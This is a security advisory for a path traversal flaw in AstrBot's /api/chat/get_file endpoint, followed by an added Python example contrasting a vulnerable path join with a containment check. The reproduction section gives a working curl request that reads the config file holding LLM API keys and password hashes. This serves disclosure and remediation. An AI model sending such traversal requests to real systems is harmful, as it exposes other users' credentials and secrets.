AstrBot Has Path Traversal Vulnerability in /api/chat/get_file
Description

Impact

This vulnerability may lead to information disclosure, such as API keys for LLM providers, account passwords, and other sensitive data.

Reproduce

Follow these steps to set up a test environment for reproducing the vulnerability.

Install dependencies and clone the repository:

```bash
pip install uv
git clone https://github.com/AstrBotDevs/AstrBot && cd AstrBot
uv run main.py
```

Alternatively, deploy the program via pip:

```bash
mkdir astrbot && cd astrbot
uvx astrbot init
uvx astrbot run
```

In another terminal, run the following command to exploit the vulnerability (the URL is quoted so the shell does not interpret `?` and `=`):

```bash
curl -L "https://0.0.0.0:6185/api/chat/get_file?filename=../../../data/cmd_config.json"
```

This request reads the cmd_config.json config file, leaking sensitive data such as LLM API keys, usernames, and password hashes (MD5).

Patches

The vulnerability has been addressed in Pull Request #1676 and is included in versions >= v3.5.13. All users are strongly encouraged to upgrade to v3.5.13 or later.

Workarounds

Users can edit the cmd_config.json file to disable the dashboard feature as a temporary workaround. However, it is strongly recommended to upgrade to version v3.5.13 or later as soon as possible to fully resolve this issue.

References

Pull Request #1676
Issue…
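As an added example that is not part of this advisory and not AstrBot's own code, the containment check this class of bug lacks: a user-supplied filename is joined to the directory the endpoint may serve from, resolved to its real on-disk target, and rejected unless that target stays inside the directory. All names (ROOT, ATTACHMENT_DIR, vulnerable_resolve, resolve_attachment, escaped) are assumptions for illustration, and the actual change made in Pull Request #1676 is not reproduced here.

```python
# Added example (not AstrBot's code, not the PR #1676 fix): a containment
# check for a download endpoint that takes a filename parameter, as
# /api/chat/get_file does. All names below are assumptions for illustration.
import tempfile
from pathlib import Path
from typing import Optional

# Constructed sandbox: an attachment directory the endpoint may serve from,
# and a sibling data directory that must stay unreachable.
ROOT = Path(tempfile.mkdtemp(prefix="traversal_demo_")).resolve()
ATTACHMENT_DIR = ROOT / "attachments"
ATTACHMENT_DIR.mkdir()
(ATTACHMENT_DIR / "hello.txt").write_text("an attachment")
(ROOT / "data").mkdir()
(ROOT / "data" / "secret.json").write_text('{"placeholder": "constructed"}')


def vulnerable_resolve(filename: str) -> Path:
    """Weak pattern: join without a containment check, so '..' segments
    (or an absolute path) walk out of ATTACHMENT_DIR."""
    return ATTACHMENT_DIR / filename


def resolve_attachment(filename: str) -> Optional[Path]:
    """Return the real path of `filename` under ATTACHMENT_DIR, or None if the
    request is malformed, missing, or resolves outside that directory."""
    if not filename or "\x00" in filename:
        return None
    # resolve() collapses '..' and follows symlinks, so the check below sees
    # the actual on-disk target rather than the string the client sent.
    candidate = (ATTACHMENT_DIR / filename).resolve()
    try:
        candidate.relative_to(ATTACHMENT_DIR)  # ValueError when outside
    except ValueError:
        return None
    return candidate if candidate.is_file() else None


def escaped(filename: str) -> bool:
    """True when the weak join lands on an existing file outside the base,
    i.e. the request would have disclosed something it should not."""
    target = vulnerable_resolve(filename).resolve()
    return target.is_file() and ATTACHMENT_DIR not in target.parents
```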
